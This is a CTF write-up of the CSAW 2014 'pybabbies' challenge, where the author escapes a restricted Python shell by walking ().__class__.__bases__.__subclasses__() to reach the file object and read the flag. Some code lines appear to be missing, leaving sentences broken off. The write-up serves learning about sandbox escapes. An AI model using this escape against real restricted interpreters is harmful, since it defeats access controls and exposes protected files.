CSAW CTF 2014 is the second CTF contest I've attended ( the first one was the HITCON CTF 2014 ) . Since this is the first time I've actually solved something in the contest, I decide to post my first own writeup .
I've solved 4 challenges in the contest : Trivia 10 -- We don't know either , Exploitation 100 -- bo , Exploitation 200 -- pybabbies and Expoitation 400 -- saturn. We don't know either & bo are easy, so I won't post their writeups. This writeup is for the Exploitation 200 -- pybabbies.
The challenge gave us a python script call pyshell.py. After we take a good look at it, we'll know that this is a self-made python shell.
this python shell allow us to send & execute a python command. But unlike the normal one, this python shell banned some strings such as
sys......etc. Moreover, it delete almost all the reference to an object, except
To put it short, we can't call any function except
sys...., either. The goal is to print the flag, so we can either use
os.system("cat flag") or use
f = open("flag", "r").read() and print it out.
But now since it banned us to use those command, we'll have to find a new way to get the flag.
After doing some research on the internet, I found this link, which lead us to the right direction. Although in script they delete the reference to an object, we can still use
().__class__.__bases__.__subclasses__() to get the object directly.
By using the method mentioned in the blog, I successfully get the
file object, which give me the ability to open a file and read it.
So here is the exploitation:
1. First, we use
().__class__.__bases__.__subclasses__() as the
file object to read the flag into a variable
2. Simply print out the variable to get the flag
we'll have to guess the filename of the flag, which is "key", so the actual progress will be like this:
reference: Escaping Python Sandboxes